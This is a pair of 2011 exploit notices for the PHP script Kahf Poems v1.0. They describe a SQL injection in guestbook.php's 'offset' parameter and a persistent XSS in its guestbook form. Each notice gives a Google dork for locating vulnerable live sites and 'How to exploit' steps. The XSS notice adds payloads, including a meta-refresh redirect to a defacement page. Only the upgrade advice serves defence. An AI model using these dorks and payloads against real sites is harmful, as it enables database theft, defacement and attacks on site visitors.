[+] Title: Kahf Poems V1.0 (guestbook.php) SQL Injection
[+] Name : Kahf Poems
[+] Affected Version : v1.0
[+] Software Link: http://www.traidnt.net/vb/traidnt19736/
[+] Tested on: (L):Vista & Windows Xp and Windows 7
[+] Date : 13/08/2011
[+] Dork : "intitle:Kahf Poems -> v 1.0 beta"& "inurl:guestbook.php?diwan_id="
[+] Author : Yassin Aboukir
[+] Contact: 01Xp01@Gmail.com
[+] Site : http://www.yaboukir.com
[+] Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',10' at line 1
[+] How to exploit :
http://localhost/Path/guestbook.php?diwan_id=8&action=view&offset=1[SQL HERE]
[+] Fix : upgrade to last release (v3)
[+] Special Thanks to Ayoub Aboukir & All Friends ...
[+] Demos :
[+] Title: Kahf Poems V1.0 (guestbook.php) Persistent XSS
[+] Name : Kahf Poems
[+] Affected Version : v1.0
[+] Software Link: http://www.traidnt.net/vb/traidnt19736/
[+] Tested on: (L):Vista & Windows Xp and Windows 7
[+] Date : 13/08/2011
[+] Dork : "intitle:Kahf Poems -> v 1.0 beta"& "inurl:guestbook.php?diwan_id="
[+] Author : Yassin Aboukir
[+] Contact: 01Xp01@Gmail.com
[+] Site : http://www.yaboukir.com
[+] Details: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
[+] How to exploit :
1- Go there : http://localhost/Path/guestbook.php?action=addnew&diwan_id=1 .
2- Put in Body field the XSS Code.
Example 1: <META http-equiv="refresh" content="0;URL=http://www.Deface-page.com">.
Example 2: <script>alert('Xssed by The W0rm')</script>
3- Put anything in the other field ( Name & E-mail).
4- Now anyone go to the guestbook page will redirected to your own paege OR exploit your XSS Code.
[+] Fix : upgrade to last release.
[+] Special Thanks to Ayoub Aboukir & All Friends ...
[+] Demos :